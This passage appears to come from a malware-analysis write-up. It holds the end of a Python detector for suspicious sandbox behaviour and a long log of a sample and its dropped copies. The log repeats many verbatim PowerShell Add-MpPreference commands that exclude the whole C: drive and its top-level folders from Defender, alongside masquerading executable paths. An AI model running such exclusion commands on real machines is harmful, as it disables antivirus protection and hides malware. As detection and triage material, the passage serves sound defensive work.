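    """Defender exclusion paths that cover a drive root or a top-level folder (depth <= 1)."""
    hits = []
    for _, kind, detail in rows:
        if kind != "Process created":
            continue
        for path in EXCLUSION_RE.findall(detail):
            parts = [p for p in path.replace("\\", "/").split("/") if p]   # 'C:/' -> ['C:']
            if len(parts) - 1 <= 1:
                hits.append(path)
    return hits


def suspicious_delays(rows):
    """Per source, the longest delay at or above LONG_DELAY_MS, labelled for quick reading."""
    longest = {}
    for source, kind, detail in rows:
        if kind != "Thread delayed":
            continue
        m = DELAY_RE.search(detail)
        if m and int(m.group(1)) >= LONG_DELAY_MS:
            longest[source] = max(longest.get(source, 0), int(m.group(1)))
    return {s: ("timespan-max" if ms == TIMESPAN_MAX_MS else f"{ms / 60000:.0f} min")
            for s, ms in longest.items()}


def fingerprinting_sources(rows, min_classes=3):
    """Sources that query at least min_classes distinct hardware-fingerprint WMI classes."""
    seen = defaultdict(set)
    for source, kind, detail in rows:
        if kind == "WMI Queries":
            for cls in WMI_CLASS_RE.findall(detail):
                if cls in FINGERPRINT_CLASSES:
                    seen[source].add(cls)
    return {s: sorted(c) for s, c in seen.items() if len(c) >= min_classes}


def masquerading_sources(rows):
    """Process paths whose file name is a system binary but whose directory is not a system dir."""
    out = set()
    for source, _, _ in rows:
        low = source.lower()
        name = low.rsplit("\\", 1)[-1]
        if name in SYSTEM_BINARIES and not low.startswith(SYSTEM_DIRS):
            out.add(source)
    return sorted(out)


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    print("broad Defender exclusions:", broad_exclusions(rows))
    print("long delays:", suspicious_delays(rows))
    print("hardware fingerprinting:", fingerprinting_sources(rows))
    print("system binary names outside system dirs:", masquerading_sources(rows))
```

                          The exclusion check is the one to act on first: excluding C:/ and every top-level folder beneath it disables Defender's on-access scanning for the whole volume, so on a live host the same paths should be confirmed with Get-MpPreference and removed with Remove-MpPreference before any cleanup of the dropped binaries.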

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Queries volume information: C:\Users\user\Desktop\3XtEci4Mmo.exe VolumeInformation
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
